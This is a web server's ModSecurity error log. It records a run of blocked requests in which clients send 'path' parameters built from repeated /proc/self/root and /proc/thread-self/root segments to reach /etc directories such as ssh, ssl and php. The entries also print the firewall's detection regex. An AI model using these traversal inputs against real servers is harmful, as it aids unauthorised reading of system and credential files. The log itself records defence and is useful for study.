[Thu Mar 19 04:45:25.491434 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:60870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuplcdf6f5d65gmYZRCCwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:45:27.963189 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:60884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuplxkFeYa1D6dYQnC87gAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:45:30.367125 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.243.128:60890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupmhkFeYa1D6dYQnC88wAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:45:31.716038 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.243.128:35410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupmxkFeYa1D6dYQnC89gAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:45:34.088798 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.243.128:35426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupngbLMZ6AikZjR9UsSAAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:45:37.536806 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:35438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupoeoXxyEfFpUF8f_fTgAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:45:40.203365 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:41326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupo9a6ubjKNq_cu4YQZAAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:45:46.215120 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:41332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupqsdf6f5d65gmYZRCHAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:45:50.042994 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:41338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuprgbLMZ6AikZjR9UsUQAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:45:53.674737 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.243.128:35436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupsQbLMZ6AikZjR9UsWgAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:45:55.942650 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.241.31:54434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupsxkFeYa1D6dYQnC9GQAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:45:58.222237 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:35444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuptgbLMZ6AikZjR9UsYQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:46:03.487394 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.241.31:60194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupuxkFeYa1D6dYQnC9KQAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:46:09.995622 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.243.128:47488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupwRkFeYa1D6dYQnC9OQAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:46:10.941948 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.241.31:60200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupwhkFeYa1D6dYQnC9OgAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:46:13.529331 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:49306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupxeyqAr6etmhZHNoydQAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:46:18.031607 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:40574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupyAkwaGbbGflqUZCDpgAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:46:19.727387 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:59652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupy8df6f5d65gmYZRCLwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:46:21.190984 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.243.128:59656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupzV_V7PWP6ixUYl6LCwAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:46:24.738568 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:59664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abup0BkFeYa1D6dYQnC9PQAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:46:30.687579 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:59672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abup1vu8EFLIOrSqIptslwAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:46:31.987817 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.243.128:55602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abup1xkFeYa1D6dYQnC9QQAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
